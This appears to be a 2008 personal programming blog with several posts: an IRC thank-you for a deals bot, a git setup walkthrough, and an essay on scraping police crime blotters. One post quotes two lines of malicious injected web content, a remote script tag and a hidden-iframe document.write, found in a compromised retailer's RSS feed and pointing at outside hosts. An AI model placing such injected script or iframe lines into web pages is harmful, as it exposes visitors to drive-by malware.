Thursday, August 21, 2008

dealer.py saves

The deals bot saves the day again:

<PsWii60> hey kvn-1
<PsWii60> I just wanted to tell you , great channel (#deals) :D
<PsWii60> I made a nice purchase the other day and talked to kbob,
he told me to talk to you and thank you
<PsWii60> so thank YOU! :)
<kvn-1> No problem dude
<kvn-1> I've purchased a few things through it as well
<PsWii60> oh ya
<PsWii60> I bought a samsung 52" lcd
<kvn-1> nice
<PsWii60> 500$ below retail price (free shipping + no tax)
<PsWii60> thanks to you :)

Saturday, August 9, 2008

git from the beginning

I have some code that was not under version control and figured it was time to get it covered by something so I went with git. The setup is butt simple. Observe:

$ mkdir crime-reporter
$ cd crime-reporter
$ git init
$ cp ../crimeparser/* .
$ git-add .
$ git-commit

And now I'm ready to branch off. I think you can even skip the mkdir step and use the current working directory if you want, but I wanted to create a new directory structure anyway. This is incidentally a new git repository to house my crime parser and eventually Hyattsville Crime Map code.

Thursday, August 7, 2008

Techbargains gets cracked

My dealviewer started serving up some bogus data from Techbargains today. I'm going to have to say that when your rss feed starts containing text like:

<script src="http://jjmaoduo.3322.org/csrss/w.js"></script>

which pulls down code that does this:

document.write("<iframe width=100 height=0 src=http://mh.976801.cn/flash.htm></iframe>");

...you can safely conclude that your data and code are in the hands of someone you probably don't know.

Judging by the message about the site undergoing "maintenance," I'd say they already know about it.

Saturday, August 2, 2008

In need of a standard

Above some arbitrary threshold, each police department reports public statistics about crimes reported within their jurisdiction. The Hyattsville City Police are no exception and will mail out a synopsis of each crime in a weekly e-mail. This e-mail is usually about a week behind the actual events and comes out in text and PDF formats. From what I can see, police departments have varying levels of sophistication when it comes to publishing their crime blotter, but a common theme is that none of them seem to publish it in a programmatically interesting way.

When I moved to Hyattsville in 2003, I was a little concerned about the crime in PG County. I started poking around the electronic services available for the city and soon found out how to get the crime blotter e-mailed to me. Having seen the Chicago Police Department's google mashup, I figured it was time for Hyattsville to get the same thing. It works great (notwithstanding persistent TIGER geocoding problems) and judging by my logs I serve quite a few people who are visualizing their local crime situation. But, I'm sad to report, it's currently broken and I'm behind on at least 3 or 4 crime reports.

I'm screen scraping. Screen scraping is the lowest of the low, the option of last resort, when you are trying to acquire data from some source. Screen scraping is essentially the practice of writing a program that pretends to be human and "reads" the screen, just as a human would while sitting in front of a browser window. It's rife with problems and prone to failure. It's brittle. Somewhere in the chain from Hyattsville PD and my e-mail inbox, someone adjusted some white space or something about the format of the reports earlier this month and that broke the whole process.

Why do I screen scrape? It's a matter of structure. The crime reports have structure and humans are very good at parsing arbitrary structures. But ill-defined structures are very difficult to properly capture in a program. There are tricks to defend against failures due to subtle changes, but the real solution is to define an interface between the two endpoints.

Someone has done this. CrimeReports.com currently provides an interface for law enforcement to publish their crime reports, and they'll essentially handle the rest. It's an attractive idea for small time departments who don't have the budget to run a web site but have citizens who find these services essential. The trick behind CrimeReports is that they charge the police a fee for this service. They want $50-$200 per month from each individual department.

But this is old school. The Web calls for something more social, more distributed. What we need is to define a standard interface for the crime report and make it easy for police departments to publish a well defined document with the crime information. It's silly for them to pay a web site for this information -- the information is what's valuable! Without crime reports there is no CrimeReports.com. Once reports are published in the same format, probably on some sort of RSS style feed, the inventive programmers of the Web will take care of the rest, all at no recurring cost to the local police.